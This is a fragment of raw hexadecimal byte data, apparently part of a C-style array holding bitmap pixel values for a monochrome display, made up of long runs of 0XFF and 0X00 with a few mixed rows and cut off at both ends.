0XFF,0XFF,0XF0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XF8,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X00,0X00,0X00,
